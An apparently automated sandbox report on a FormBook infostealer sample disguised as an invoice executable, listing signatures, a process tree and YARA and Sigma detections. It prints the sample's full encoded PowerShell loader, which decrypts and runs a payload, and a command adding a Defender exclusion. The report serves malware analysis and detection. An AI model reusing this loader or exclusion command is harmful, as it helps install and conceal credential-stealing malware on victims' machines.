Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Factura (3).exe

Overview

General Information

Sample name:Factura (3).exe
Analysis ID:1442718
MD5:367f6a9b9b00f860281fe3865a0d33f0
SHA1:b82f862d256fd63ceb31982178b35f31670a13d3
SHA256:0b5726f67e41a222543e4bc949db567350231b5dd0c791d72ce2005e0a5af704
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Factura (3).exe (PID: 7400 cmdline: "C:\Users\user\Desktop\Factura (3).exe" MD5: 367F6A9B9B00F860281FE3865A0D33F0)
    • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7492 cmdline: powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADAALAAgADAAeABCADAALAAgADAAeAA1AEIALAAgADAAeAAzAEQALAAgADAAeAA3ADEALAAgADAAeAA4ADAALAAgADAAeABBADcALAAgADAAeABEAEMALAAgADAAeABBADgALAAgADAAeAA1AEMALAAgADAAeAAyADYALAAgADAAeAA5AEEALAAgADAAeAA3AEIALAAgADAAeAA5ADIALAAgADAAeABEAEQALAAgADAAeABFADcALAAgADAAeAA3ADYALAAgADAAeABEADAALAAgADAAeABDAEYALAAgADAAeAA0ADIALAAgADAAeAA5ADAALAAgADAAeABCAEIALAAgADAAeAA2AEYALAAgADAAeAA1AEYALAAgADAAeABDADQALAAgADAAeABCADgALAAgADAAeAAxAEQALAAgADAAeABBADYALAAgADAAeABCAEUALAAgADAAeABFADQALAAgADAAeAA2AEMALAAgADAAeAAzADUAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFADcALAAgADAAeAA5ADkALAAgADAAeAAyADEALAAgADAAeAAyADcALAAgADAAeAA1AEEALAAgADAAeAAyAEQALAAgADAAeAAzADEALAAgADAAeAA1ADMALAAgADAAeAAwAEUALAAgADAAeABCAEIALAAgADAAeABFADQALAAgADAAeABFAEUALAAgADAAeAAyAEIALAAgADAAeAA5ADQALAAgADAAeABFADMALAAgADAAeAAwAEMAKQAKAAoAaQBmACAAKAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAKACAAIAAgACAAJAAfBEMEQgRMBCQEMAQ5BDsEMAQgAD0AIAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsELgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAFwQwBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQRBDAEOQRCBEsEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAB8EQwRCBEwEJAQwBDkEOwQwBCkAOwAKACAAIAAgACAAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQgAD0AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAC0AGgQ7BE4ERwQgACQAGgQ7BE4ERwQgAC0AGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAC0AFAQwBD0EPQRLBDUEIAAkABcEMARIBDgERARABD4EMgQwBD0EPQRLBDUEEQQwBDkEQgRLBAoACgAgACAAIAAgACQAIQQxBD4EQAQ6BDAEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAYgB5AHQAZQBbAF0AXQBAACgAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQpACkAOwAKACAAIAAgACAAJAAiBD4ERwQ6BDAEEgRFBD4ENAQwBCAAPQAgACQAIQQxBD4EQAQ6BDAELgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQAIgQ+BEcEOgQwBBIERQQ+BDQEMAQuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoAfQAKAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • calc.exe (PID: 7776 cmdline: "C:\Windows\System32\calc.exe" MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • csc.exe (PID: 7856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • KAnMKAQhHABqpRuDRpLtww.exe (PID: 1956 cmdline: "C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • chkdsk.exe (PID: 4920 cmdline: "C:\Windows\SysWOW64\chkdsk.exe" MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
            • KAnMKAQhHABqpRuDRpLtww.exe (PID: 1016 cmdline: "C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 1544 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • WerFault.exe (PID: 7932 cmdline: C:\Windows\system32\WerFault.exe -u -p 7492 -s 2236 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2dc53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        14.2.csc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          14.2.csc.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ce53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          14.2.csc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            14.2.csc.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dc53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADAALAAgADAAeABCADAALAAgADAAeAA1AEIALAAgADAAeAAzAEQALAAgADAAeAA3ADEALAAgADAAeAA4ADAALAAgADAAeABBADcALAAgADAAeABEAEMALAAgADAAeABBADgALAAgADAAeAA1AEMALAAgADAAeAAyADYALAAgADAAeAA5AEEALAAgADAAeAA3AEIALAAgADAAeAA5ADI
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADAALAAgADAAeABCADAALAAgADAAeAA1AEIALAAgADAAeAAzAEQALAAgADAAeAA3ADEALAAgADAAeAA4ADAALAAgADAAeABBADcALAAgADAAeABEAEMALAAgADAAeABBADgALAAgADAAeAA1AEMALAAgADAAeAAyADYALAAgADAAeAA5AEEALAAgADAAeAA3AEIALAAgADAAeAA5ADI
            Sigma detected: Suspicious Execution of Powershell with Base64
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeA